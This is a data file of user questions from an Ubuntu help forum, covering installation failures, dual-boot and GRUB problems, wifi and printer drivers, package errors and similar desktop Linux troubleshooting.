444902	install ubuntu from iso image on dvd	i am trying to install ubuntu on a sony vaio model pcg-fx501 . i have created several iso images but they can only be written to a dvd as i use nero . ( because of the size of the file ) . non will install and the install hangs without any error messages . the pc originally had xp professional installed . an attempt at changing partitions managed to completely screw up the xp boot but i have managed to reformat the partition to ntfs and the instal of ubuntu starts but does not complete . does the install media have to be a cd and if so how can i achieve it please . regards pete
444908	is it possible to execute scp/rcp/sftp from linux server to windows desktop ?	i have an linux server , and i would like to remote copy files from linux server to another windows os machine , i have tried this method shown as below and it is not working . scp -v samplefile username ( get it from computer properties in window ) @ myip : /c/ : does anyone know how to make it work ?
444911	how to reporting bugs ( most efficient way ) on launchpad ?	i have bug with my huawei ec1260-2 modem connecting into ubuntu 14.04 beta2 . it detect my modem but it can not establish the connection and the bug dialog does n't appear . it runs fine on ubuntu 12.04 - 13.10 so how the most efficient ( and maybe easiest ) way for reporting the bug to launchpad ?
444913	brother dcp-7055 printer does n't work on ubuntu	i have brother dcp-7055 and it does n't print . with default ubuntu drivers installed `` printing completed '' message appears but nothing happens . after installing a driver from brother 's website printing tasks are added to the queue and sit there , nothing is being printed too . i 've installed the brother driver from 'linux-brprinter-installer-2.0.0-1.gz ' file but i did n't went through the steps from brother 's installation manual how do i remove both printers and all drivers ( files , packages ) so that i can start over ? can you suggest any other solution ?
444916	detect program is not responding	in ubuntu , when a program is not responding , a gray shadow comes over it so the user notices that it is not responding . my question is how can i detect if any running program is not responding from command line , python code , etc. ? i want to create a program that closes not responding programs automatically . meanwhile , how does the x window system itself detects/guesses the program is not responding ?
444917	can not uninstall any software from ubuntu 12.04	i ca n't uninstall anything either from software centre or by using synaptic or the terminal tl ; dr laptop @ laptop-hp-compaq-nc6400-rc454aw-abu : ~ $ sudo apt-get -- purge remove deluge [ sudo ] password for laptop : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : language-pack-kde-ml-base thunderbird-locale-ast ... # hundreds of packages here use 'apt-get autoremove ' to remove them . the following packages will be removed deluge* 0 to upgrade , 0 to newly install , 1 to remove and 9 not to upgrade . 1 not fully installed or removed . need to get 0 b/966 kb of archives . after this operation , 91.1 kb disk space will be freed . do you want to continue [ y/n ] ? y selecting previously unselected package burg-theme-minimal-sir . ( reading database ... 556541 files and directories currently installed . ) preparing to replace burg-theme-minimal-sir 0.5.0-1 ( using ... /burg-theme-minimal-sir_0.5.0-1_all.deb ) ... unpacking replacement burg-theme-minimal-sir ... generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : warning : subprocess old post-removal script returned error exit status 1 dpkg - trying script from the new package instead ... generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : error processing /var/cache/apt/archives/burg-theme-minimal-sir_0.5.0-1_all.deb ( -- unpack ) : subprocess new post-removal script returned error exit status 1 no apport report written because maxreports has already been reached generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . try `/usr/sbin/burg-probe -- help ' for more information . dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/burg-theme-minimal-sir_0.5.0-1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) short version when attempted to uninstall deluge , following are the important messages selecting previously unselected package burg-theme-minimal-sir . preparing to replace burg-theme-minimal-sir 0.5.0-1 ( using ... /burg-theme-minimal-sir_0.5.0-1_all.deb ) ... ... ... generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat `/boot/burg/locale ' . no path or device is specified . ... ... dpkg : warning : subprocess old post-removal script returned error exit status 1 ... ... no apport report written because maxreports has already been reached
444918	dell inspiron n5010 : wifi networks getting detected but not connecting	i am new to ubuntu 12.04 lts and do not know how to use the terminal at all . i have tried whatever i could but i believe i need a little more step-by-step help . the wifi networks are getting detected . but when i ask for connection and enter my credentials , it does n't get connected . keeps asking for credentials again and again . i tried all different combinations of security options in the settings but nothing seems to work . the wifi worked the first day but then it has n't worked for a week now . i keep trying . : ( tata photon plus data card is working fine . could you please help and tell me what i should do to try to make it work ? thank you so much . response from 'lspci ' : sahana @ sahana-inspiron-n5010 : ~ $ lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 12:00.0 network controller : intel corporation centrino wireless-n 1000 [ condor peak ] 13:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 )
444919	is it possible to duplicate a file or folder in nautilus directly ?	as of right now , if i want to duplicate a folder or file , i right click on it , choose 'copy ' , click on nautilus itself to change focus from current folder/file , right click somewhere else and choose 'paste ' . is it possible to duplicate a folder or file directly , like through a 'right click ' - > 'duplicate ' in nautilus ?
444920	how to get a displaylink display adapter working in ubuntu 13.10	i have a uga-2k-a usb 2.0 to dvi displaylink graphics adapter and i 'm trying to get it to work on ubuntu 13.10 in order to hook it up to a display . first , i confirmed that the package xserver-xorg-video-modesetting was installed . it was by default . next , i connected the graphics adapter . the dmesg output on initial connection connection was as follows : [ 4679.672775 ] usb 2-2 : new high-speed usb device number 9 using xhci_hcd [ 4679.690786 ] usb 2-2 : device descriptor read/8 , error -32 [ 4679.810714 ] usb 2-2 : device descriptor read/8 , error -32 [ 4680.025025 ] usb 2-2 : new high-speed usb device number 10 using xhci_hcd [ 4680.045611 ] usb 2-2 : new usb device found , idvendor=17e9 , idproduct=0378 [ 4680.045621 ] usb 2-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 4680.045626 ] usb 2-2 : product : plugable uga-2k-a [ 4680.045631 ] usb 2-2 : manufacturer : displaylink [ 4680.045634 ] usb 2-2 : serialnumber : 786492 [ 4680.097418 ] [ drm ] vendor descriptor length:22 data:22 5f 01 00 20 05 00 01 03 00 04 [ 4680.330439 ] udl 2-2:1.0 : fb1 : udldrmfb frame buffer device [ 4680.330452 ] [ drm ] initialized udl 0.0.1 20120220 on minor 1 [ 4680.330503 ] usbcore : registered new interface driver udl i understand that the line udl 2-2:1.0 : fb1 : udldrmfb frame buffer device implies that the kernel driver has bound . at this point , the led on the device was not lit and the display connected to the graphics adapter did not register a signal . some information on the kernel and xrandr is the following : uname -r 3.11.0-18-generic xrandr -- version xrandr program version 1.4.0 server reports randr version 1.4 xrandr -- listproviders providers : number : 1 provider 0 : id : 0x49 cap : 0xb , source output , sink output , sink offload crtcs : 4 outputs : 6 associated providers : 0 name : intel i rebooted the computer with the graphics adapter attached . the relevant dmesg output on boot was as follows : [ 2.118884 ] usb 2-2 : new high-speed usb device number 3 using xhci_hcd [ 2.138973 ] usb 2-2 : new usb device found , idvendor=17e9 , idproduct=0378 [ 2.138978 ] usb 2-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 2.138980 ] usb 2-2 : product : plugable uga-2k-a [ 2.138982 ] usb 2-2 : manufacturer : displaylink [ 2.138984 ] usb 2-2 : serialnumber : 786492 [ 2.144629 ] [ drm ] initialized drm 1.1.0 20060810 [ 2.149981 ] [ drm ] vendor descriptor length:22 data:22 5f 01 00 20 05 00 01 03 00 04 [ 2.262948 ] tsc : refined tsc clocksource calibration : 2394.457 mhz [ 2.290353 ] open /dev/fb0 user=0 fb_info=ffff88020e9e2800 count=1 [ 2.293046 ] [ drm ] write mode info 153 [ 2.293051 ] console : switching to colour frame buffer device 210x65 [ 2.307012 ] usb 2-4 : new full-speed usb device number 4 using xhci_hcd [ 2.317593 ] udl 2-2:1.0 : fb0 : udldrmfb frame buffer device [ 2.317595 ] udl 2-2:1.0 : registered panic notifier [ 2.317599 ] [ drm ] initialized udl 0.0.1 20120220 on minor 0 [ 2.317628 ] usbcore : registered new interface driver udl [ 2.324247 ] usb 2-4 : new usb device found , idvendor=8087 , idproduct=07dc [ 2.324251 ] usb 2-4 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 2.491175 ] usb 2-5 : new full-speed usb device number 5 using xhci_hcd at this point , the led on the device is lit and the display connected to the graphics adapter registers a signal ( though the image is black ) . the output of xrandr -- listproviders remains the following : providers : number : 1 provider 0 : id : 0x49 cap : 0xb , source output , sink output , sink offload crtcs : 4 outputs : 6 associated providers : 0 name : intel i am not sure what to do next . according to a forum post , it may be that i need to slave the second graphics device to the first , but i have no idea how to do this . i would really appreciate some guidance . : ) thanks !
444921	is `` screen-cleanup '' service safe to disable ?	i want to decrease my startup process and i see the service named `` screen-cleanup '' what is that ? is it safe to remove ?
444922	audio libs can not load when running java aplet from web	when logging in to my company web sites internet conferancing app the following error appears `` unable to load audio libs '' . the site runs a java aplet to allow multi user conferancing . a soluition to this issue would be greatly apperaceted
444923	legal question about ubuntu	so for many years i have been suggesting friends and family to switch to ubuntu as it is my choice of os , my question is this , can i offer setting up ubuntu for small businesses as a paid job . now obviously i would n't be charging the customer for the operating system just the labor of installing and training etc . but still is that something i am able to do as i would n't be selling the product just using my expertise to install it for a business . main reason is with the vast majority of small companies using xp that is as of now redundant i feel ubuntu would be a proven great alternative . thankyou in advance .
444927	fuji camera software	i 've just bought a fujifilm x20 camera , and would like to install the fuji software from the cd . tried using wine with ubuntu 13.10 . however , when trying 'install ' the program wo n't run at all . fyi i 've copied the whole cd to a .fujifilm subfolder so i could set all the .exe files to be run as a program . no luck ! unable to find any info in the wine database . does anyone have experience with this software and has made it work ? i would like to fix this so i can work with the x-trans raw files . ( darktable wo n't touch them ! ) . any help appreciated .
444929	installation failed for api	i 'm developing an app for sending osc messages working through the outlet port 4444 and i am using a c api call liblo . project page : http : //liblo.sourceforge.net normal install it by running the command : ./configure , make and sudo make install but when executing a file api appears the following error message : example_client.c gcc-llo example_client.c : 21:10 : fatal error : 'lo / lo.h ' file not found # include < lo/lo.h > i will check the correctness of the same and see that the folder `` lo '' folder ( api ) is not discharged in the lib directory , but in the include . then i export this same folder to the lib directory and the error persists . what can be this error ?
444930	why is ubuntu one going to be shut down ?	i just received an e-mail from canonical warning me that the ubuntu one service is going to shutdown . is this real ? has anyone else got the same e-mail ? why is this happening ? any information would be appreciated : s email : hi , we are writing to you to notify you that we will be shutting down the ubuntu one file services , effective 1 june 2014 . this email gives information about the closure and what you should expect during the shutdown process . as of today , it will no longer be possible to purchase storage or music from the ubuntu one store . the ubuntu one file services apps in the ubuntu , google , and apple stores will be updated appropriately . as always , your content belongs to you . you can simply download your files onto your pc or an external hard drive . while the service will stop as of 1 june , you will have an additional two months ( until 31 july 2014 ) to collect all of your content . after that date , all remaining content will be deleted . if you have an active annual subscription , the unused portion of your fees will be refunded . the refund amount will be calculated from today 's announcement . we know you have come to rely on ubuntu one , and we apologise for the inconvenience this closure may cause . we 've always been inspired by the support , feedback and enthusiasm of our users and want to thank you for the support you 've shown for ubuntu one . we hope that you'll continue to support us as together we bring a revolutionary experience to new devices . the ubuntu one team
444932	days countdown timer in ubuntu menu bar	i need an applet that can count up to specific number of days . i 'm currently using the 'alarm-clock-applet ' from software center but it can only count up to 24 hours . i need a countdown timer in days which will be visible on top notification area along with regular clock .
444934	after selecting `` ubuntu '' in the booting ( wubi ) screen , an extra selection screen appears	sorry if asking basic questions , but i 'm new with linux ... i installed ubuntu 12.04 via wubi in an old laptop ( along with windows xp ) . when starting the laptop i get a first screen asking to choose between windows ( 1st option ) and ubuntu ( 2nd option ) . after choosing ubuntu , it displays one line ( disappearing immediately ) with an error and something like nfts ( i think , as too quick to read ) and then another booting selection screen , with 4 options , appears . options are 1 ) ubuntu normal , 2 ) ubuntu recovery mode , 3 ) previous linux version ( not sure why , but seems to appear since i followed the auto-update of the system post 12.04 installation ) , and 4 ) windows xp . although everything seems to work ( after choosing option 1 ) i 'm not sure if i can fix the booting screen ( going into the second screen with the 4 options ) ?
444936	ubuntu installed to usb key , but not recognized as bootable	this is not a duplicate of how to install ubuntu to a usb stick or similar questions . though there might be bits of helpful information in other questions/answers , my question is not a duplicate , because my problem is not installing ubuntu to the usb key . i 've done that and i 'm past this step . instead , my problem is that the usb key does n't boot ( probably only on my machine ) . these two are distinct problems . question : i seem to be unable to produce a working usb stick installation ( not live usb stick ) for my pc . here are the details : to create the usb stick , i go this path : booted from ubuntu 12.04.4 dvd used usb-stick-creator to create live usb stick from the same dvd image as used for burning the boot dvd booted from the live usb stick installed from live usb stick to another usb stick now the problem starts : my computer does not detect the usb stick with the normal installation as a boot device . when i try to boot with the stick plugged in , it does n't boot from it although usb devices are put first in the boot order in the bios . if i hit f10 at startup ( boot menu ) , then i get the boot menu , but the stick is not listed . i 've switched between `` classic '' and `` uefi '' boot options in the bios , but neither of them work . i 've done the above procedure at least 3 times and the results were always the same . during the installation procedure , i 've always carefully selected the device to which to install the boot loader . here , i 've always selected the usb stick to which i installed . my pc is a medion erazer x7827 . what else can i do about this ? telling from the installation procedure , ubuntu is n't really intended to be booted from usb stick . it is clumsy to install to usb , because you need to manually configure the partitions and you may not miss to select the correct boot device . there is no option `` install to that usb stick '' ready made . is this kind of installation something unusual that i should n't do , and there is a better solution for this ? ! something very similar happens with ubuntu 13.10 . so far , i only found out that the beginning of the resulting usb stick contains different data depending on if uefi was enabled at installation time or not . i guess that when installing while uefi is enabled , i also have to enable uefi when booting and the other way around , when it 's disabled as install time , it probably needs to be disabled at boot time , too . this does n't help though .
444939	can not find package ( pymol )	i 'm trying to install the program pymol ( https : //apps.ubuntu.com/cat/applications/raring/pymol/ ) on my system ( i have ubuntu 13.04 ) . i 've tried it via this link to the softwarecentre and via the terminal using sudo apt-get install pymol . however , it always says that it can not find the package . thank you
444940	how to use wifi on ubuntu with a dual boot ( macbook air ) ?	i 'm new on ubuntu system and i do not manage to run the wifi , i am using ubuntu with a dual boot on a macbook air 6,2 , type of card : airport extreme ( 0x14e4 , 0x117 ) version of internal program : broadcom bcm43xx 1.0 ( 6.30.223.154.63 ) thx
444943	audio recorder recording silent	i just installed audio recorder on an ubuntu 12.04 and tried to record something from my system 's output . unfortunately it does not record anything . it shows up perfectly , as if it would record , but i just get `` silent '' files . i tried all possibilities with the audio source , both on audio recorder and on my system : `` built-in audio analog stereo ( audio output ) '' , `` system 's default device '' - on the app and `` analog stereo duplex '' ( the default ) and `` analog stereo output '' on my system , but the result is the same : silent audio files . what should i do ? thank you ,
444945	no connection to wireless internet during `` try ubuntu '' 12.04 from usb stick	i 'm one of the probably many who 's looking for an alternative to windows xp , so i 've put ubuntu 12.04 on a usb for booting and then successfully did try ubuntu without installing , which went smooth . once in the trial live desktop , i see the wireless icon on the menu bar but no option to connect to my wireless router . i have a dell vostro 2510 laptop running windows xp , and as wireless chipset in control panel it says chipset bcm4315/bcm22062000 . i do not have a wired cable option . do i need to do a full install of ubuntu to be able to connect to internet or can i connect ( and how ? ) even during the trial from usb ? i 'm a total newbie to ubuntu so please use `` normal '' language : - ) -- thanks !
444948	i want your suggestion about setting up mail server on standalone server on windows azure	i would like to ask a question regarding setting up mail server . i 've windows azure subscription . i 'm already running a virtual machine with lamp stack and now want to configure mail server . i want to setup mail server for different domains like : abc.com , xyz.com etc ... should i setup mail server on separate virtual machine with ubuntu or setup on existing same server ? i also want to know how can i install and configure mail server . i 'm not an experienced ubuntu user . please advise me . thanks in advance
444951	information every time i run up laptop	every time i run up my laptop i get the following message . `` information sheet- waiting list july 2013 break even cost ( 2 ) doc and 13 other files are being uploaded to your personal cloud '' can you please tell me what to do to remove this ? thank you , roanantelope .
444953	porting ubuntu touch on samsung galaxy s2 plus	can i port ubuntu touch on samsung galaxy s2 plus i9105p ? thanks
444956	unable to see screen after amd catalyst driver install	i have the following setup : z87 extreme motherboard . asus hd 7790 graphics card . asus r9 280x graphics card . ubuntu 12.04 i have been able to install both the latest beta drivers and the latest stable drivers and they work to a point where i can see both graphics cards after running the following command : sudo aticonfig -- initial -- adapter=all but when i reboot the screen does not come back to where i can see anything on it . it just says no signal . i can remotely ssh into the server and run commands from there . when both graphics cards are connected none of the graphic output ports seem to work . the on-board graphics card seems to stop working after a reboot and both of the pci connected do not output anything to screen . i have tried changing the options for integrated graphics in the bios from on-board to pci express ( only 2 options available ) and various combinations . when i unplug the graphics cards the system then does not reboot where it will show anything on screen . it seems when i reboot it switches over to output on one of the cards but no output actually appears on screen . adding a graphics card should n't be this difficult in ubuntu . has anybody any idea what could be happening or a steer in the right direction ? [ edit ] as a starting point ... for the two cards i have installed in my system , which drivers should i be installing ? ( note : i have now updated to ubuntu 13.10 but i see the same issue after rebooting )
444960	no partitions grub error from a dual boot from windows seven after deleting the ubuntu partition	i deleted the ubuntu partitions from window seven then i restarted the machine but it wont start up but i cant get back to windows seven.instead i get a no partition grub rescue > error.i cant even get to the bios options because when i immediately switch on the computer i get the error window.i ca n't do anything.i deleted the partition because i wanted to uninstall it from the dual boot the install it in a virtual box inside windows.the problem is that when i switch on my toshiba satellite laptop i immediately get the error that there is no such partition grub error.i ca n't do anything but just look at the no such partition grub rescue on the black screen .
444961	how to use secure printing on ubuntu 12.04 on workstation and debian 6.0 on server ?	can anyone give me a step-by-step on how to make samsung sl-m4020nd to print on secure printing mode on ubuntu 12.04 on workstation and debian 6.0 on server ? i installed the printer but i canâ´t find this option . thank you in advance !
444965	lscpu output differs when called indirectly ?	i use lscpu | grep 'mhz ' to get my clock speed . i am getting different results based on the method i am calling this command . method 1 : typing it in the terminal cpu mhz : 1200.000 method 2 : encapsulating it in a script called test.sh script code : # ! /bin/bash cpu= $ ( lscpu | grep 'mhz ' ) echo $ cpu then , in the terminal $ chmod +x test.sh $ ./test.sh output : cpu mhz : 1200.000 so far so good . but now , method 3 : hiting the 'run or view current file ' in geany on test.sh . output : cpu mhz : 2200.000 method 4 : writing a python script called test.py that calls test.sh . python script code : # ! /usr/bin/python import subprocess def test ( ) : subprocess.call ( `` ./test.sh '' ) if __name__ == '__main__ ' : test ( ) then , in the terminal : $ python test.py output : cpu mhz : 2200.000 i 've tried both python and python3 . both give the same ( erroneous ) result . why does lscpu give a different output when it is run indirectly ? and how can i fix this/circumvent this ? is something wrong in my code ? for what it 's worth , i am running ubuntu 13.10 . thanks : - ) .
444966	bash/zsh : undo erase backwards ( ctrl+w )	in bash and zsh ctrl+w erases backwards from where the cursor is . is it also possible to undo what i had erased ? thanks !
444967	issues with python-pip and speedtest-cli	dpkg : error processing python-pkg-resources ( -- configure ) : subprocess installed post-installation script returned error exit status 137 dpkg : dependency problems prevent configuration of python-setuptools : python-setuptools depends on python-pkg-resources ( = 0.6.28-1ubuntu2 ) ; however : package python-pkg-resources is not configured yet . dpkg : error processing python-setuptools ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-pip : python-pip depends on python-pkg-resources ; however : package python-pkg-resources is not configured yet . python-pip depends on python-setuptools ( > = 0.6c1 ) ; however : package python-setuptools is not configured yet . dpkg : error processing python-pip ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python-pkg-resources python-setuptools python-pip and speedtest-cli traceback ( most recent call last ) : file `` /usr/local/bin/speedtest-cli '' , line 5 , in from pkg_resources import load_entry_point file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 17 , in from urlparse import urlparse , urlunparse file `` /usr/lib/python2.7/urlparse.py '' , line 116 , in from collections import namedtuple valueerror : bad marshal data ( string ref out of range ) are the error messages that i get when i try to either upgrade ubuntu or run speedtest-cli . i personally have no idea what im doing so help is very much appreciated .
444968	partition problem with dual booting	i 'm trying to dual boot ubuntu with windows xp . windows is on the c drive and i want to install ubuntu on the d drive . when i get to the partitions table during installation , there should be a dev/sda and a dev/sdb options , but the second is n't there . all i can choose from are dev/sda , dev/sda1 and dev/sda5 . i really do n't know which one should i choose so that i do n't screw up windows . all help appreciated . p.s . i 'm installing ubuntu from a usb flash drive .
444970	open the first ( or any ) file from command line	suppose i 'm browsing a directory from command line with lots of files with long names . is there a easy/fast way to open the first file from the directory , or simply any of these files ? in my case they are pictures , so if i 'm able to open one of them , i can browse the pictures from the application ( eog , for instance ) . completion does n't help in this case , as the pictures are named with a similar prefix and the suffix is a date -- so completing one filen name ends up taking some time . i know , it 's just some seconds.. but the idea of using command line is to be fast , right ? thanks !
444974	difference between 'grep ' in ubuntu and kali linux ?	i always used the following command to filter out my contacts email addresses from a directory in kali linux : grep -riheo `` \b [ a-za-z0-9._- ] + @ [ a-za-z0-9._- ] +\ . [ a-za-z0-9._- ] +\b '' > > 1a i tried it in ubuntu now and its not working . there is no error message , just its doing something but without result and end . why ? i tried with ubuntu 12.04 and xubuntu 12.04 . thanks .
444977	( lubuntu ) how to move close , minimize and maximize to the left	there seem to be plenty of responses for gnome shell and unity , but i 'm not sure about lubuntu . i just found very old answers on other sites ( for releases < 10.04 etc ) but did n't want to try them in case things had changed and i broke something . so how do i move the three buttons ( close , maximize and minimize ) from their current position on the upper right hand corner of the window , to the upper left hand corner ? ( using an up to date lubuntu 13.10 )
444978	ubuntu 12.04 desktop with no launcher and no shortkeys working	i have accidentally uninstalled python 2.7 and python-minimal from my ubuntu . it gave me an error saying wicd has shut down and there are broken packages . when i restarted the system , only the desktop is seen . no launcher or any other panels are seen . even alt+t is not working to open up the terminal . i have a folder in my desktop which can help in navigating to the file system . please help me ...
444982	install bison 2.7 in ubuntu 14.04	when i try to install bison on my ubuntu 14.04 using the command sudo apt-get install bison , the version 3 is installed . i would like to downgrade bison to use the version 2.7 . how can i do it ? thanks .
444988	installation - failure to complete ubuntu 12	trying to perform a new installation , the process gets to `` retrieving file 31 of 81 '' then hangs . no better after several attempts .
444997	how should i design an ubuntu app icon for unity 8 ?	are there any guidelines available for designing an ubuntu app icon which will fit in visually with the rest of the system ? by this , i mean it should be consistent with the new app icons being used in unity 8 using the `` suru '' style .
444999	i 'm looking for intel64.iso	i always confusing when download ubuntu flavour . my system is 64bit intel processor ( 4gb ram ) . when i download 64bit it 's downloadind amd64.iso . upto my knowledge adm and intel processors are different . let me clear this . how amd64 drivers are compatible with x86_64 architecture ?
445000	how can i install ubuntu to a spare second hard drive ?	i have recently purchased 'ubuntu unleashed ' with a view to making a first time installation of ubuntu . the book contained a dvd version 13.10 but i have so far been unsuccessful with the actual installation itself i am attempting to instal the program on a spare second ssd ( d : ) - my other ssd has windows 7 ( c : ) . i am unable to find a way to inform the installation to instal ubuntu onto the second drive ( d : ) . it will install itself perfectly well onto the remaining space on c : ( but of course i do n't want it there ) . at the very beginning of the set up , in the 3 choices , which ever i choose i never see an option to choose the final destination - drive d : the dual boot installs itself beautifully but both os 's are on the same drive ! what am i doing wrong ?
445002	finding mouse click position in iconview in gtk	i am building a file browser using gtk.iconview in python . i am trying to find the path of an icon selected using `` selection-changed '' signal using gtk.iconview.get_path_at_pos ( x , y ) . the docs are mum on how to obtain the ( x , y ) . how do i find them ?
445004	assign geany or gedit highlight to text	is there any way to assign geany highlight to text . for example when i pass a programming code to geany . functions color is red . the thing which i am looking for is assingning these color to text . for example if i open that with another editor ( which does not highlight the text ) the colors remain .
445008	/boot is full and i can not remove old images or run apt-get install -f	i know this topic is beet to death , but i seem to be stuck . i have a bunch of ubuntu servers that are running on vmware that have this issue . here is my disk capacity ... userr @ dba120 : ~ $ df -h filesystem size used avail use % mounted on /dev/mapper/dba120-root 15g 4.2g 9.7g 30 % / udev 489m 4.0k 489m 1 % /dev tmpfs 200m 236k 199m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 498m 0 498m 0 % /run/shm /dev/sda1 228m 225m 0 100 % /boot ... as you can see /boot is full . here are the images that are install.. me @ dba120 : ~ $ dpkg-query -l|grep linux-im* ii linux-image-3.2.0-29-generic 3.2.0-29.46 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-48-generic 3.2.0-48.74 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-51-generic 3.2.0-51.77 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-52-generic 3.2.0-52.78 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-53-generic 3.2.0-53.81 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-54-generic 3.2.0-54.82 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-55-generic 3.2.0-55.85 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-56-generic 3.2.0-56.86 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-57-generic 3.2.0-57.87 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-58-generic 3.2.0-58.88 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-59-generic 3.2.0-59.90 linux kernel image for version 3.2.0 on 64 bit x86 smp iu linux-image-server 3.2.0.58.69 linux kernel image on server equipment . if i try and remove an old image i get this ... me @ dba120 : ~ $ sudo apt-get remove linux-image-3.2.0-29-generic reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-server : depends : linux-headers-server ( = 3.2.0.58.69 ) but 3.2.0.60.71 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . ..and if i try and run 'apt-get -f install ' i get ... http : //pastie.org/9003609 where i can seem to run install because the disk is full . not sure where to go from here . any help appreciated !
445009	i can install ubuntu for samsung galaxy mega 6.3 ?	i just wan na know if i can put ubuntu on my galaxy mega 6.3 . i like how it 's works and the difference between android and ubuntu .
445012	boot problem after installing ubuntu 13.10 operating system not found vaio	i have a sony vaio bought in 2013 ( model svs151290x ) . first i wanted to run windows 8 + ubuntu so i deleted the windows recovery partition ( 32gb ) and tried to install the ubuntu there . something wrong happened during the attempt to install that i did n't even go trough the installation process and when i restarted the computer , it would n't boot but show a message : '' operating system not found '' i knew windows files would still be there , but neither sony nor microsoft would give me any recovery media . ( vaio do n't come with a cd or usb with windows 8 and they say the product key is inside the bios ) . i decided then , something i should have done long time ago , to install only ubuntu . i made a new usb with the ubuntu 13.10 and selected the option to erase disk and install ubuntu . everything went fine in the installation but when it finished , it asked to reboot . after rebooting the same error message appeared : '' operating system not found '' i have tried many things for days but still ca n't find the reason why it is happening . here is the log file for the boot repair : paste.ubuntu.com/7221785 does anybody knows how to solve that ? thank you very much for your help
445016	wubi installed ubuntu 12.04 in windows xp not to open	i have downloaded ubuntu 12.04 with wubi installer according to the proper instructions and when restarted i am not able to start ubuntu . it is installed in the d : drive in windows xp . when restarting i have only access to windows xp . how can i boot into ubuntu ?
445018	how do i install dual boot properly ? ? last attempt corrupted mbr completely	dell inspiron n5110 with i5 , 4gb ram , 500gb hdd windows 7 and ubuntu 12.04.4 . i booted off a live usb and everything was great . i really want ubuntu so i tried to do a dual install using the included install app . i selected 50gb space , and ran the install . everything was great until i re-booted . then i got an error message saying there was no such device ( ? ) and completely crashing . i had to boot of the live usb again to get anything to work at all . i then deleted the two partitions created during the install , rebooted using a hirens usb stick , which got me back into windows . i then created a system repair disk and re-booted again with the cd . i was able to repair the mbr after that and finally get windows to boot normally . but ... i still want to install ubuntu 12.04.4 if i can figure out what went wrong and get it to work properly . any advice ? ? ? ? additional information.. thanks for the reply but no go with that . i just tried to install 13.10 and the install said i there was no op system detected . in other words , i could not detect windows 7 ( after i repaired the mbr ) yet i can boot windows 7 normally . this is very frustrating . i know ubuntu is working because i can boot from a live usb with no problem and run in trial mode all day . but of course , ca n't add aps and save it in trial mode . i want to install so i can add gnuradio for some radio astronomy projects . my other option is to use pentoo unix but i 'd prefer to stick with ubuntu .
445025	can not deploy local charms after juju upgrade	i keep getting error only charm store charm references are supported , with cs : schema when i try to deploy charms from a local repository . my commands look like juju deploy -v -- repository= $ home/charm/ local : storm stormmaster currently , the deployment documentation reflects this way of doing deployments . what do i need to change to deploy my local charms ? edit : the local repository deployment works on 1.16.6-precise-amd64 and does not work on 1.18.0-saucy-amd64
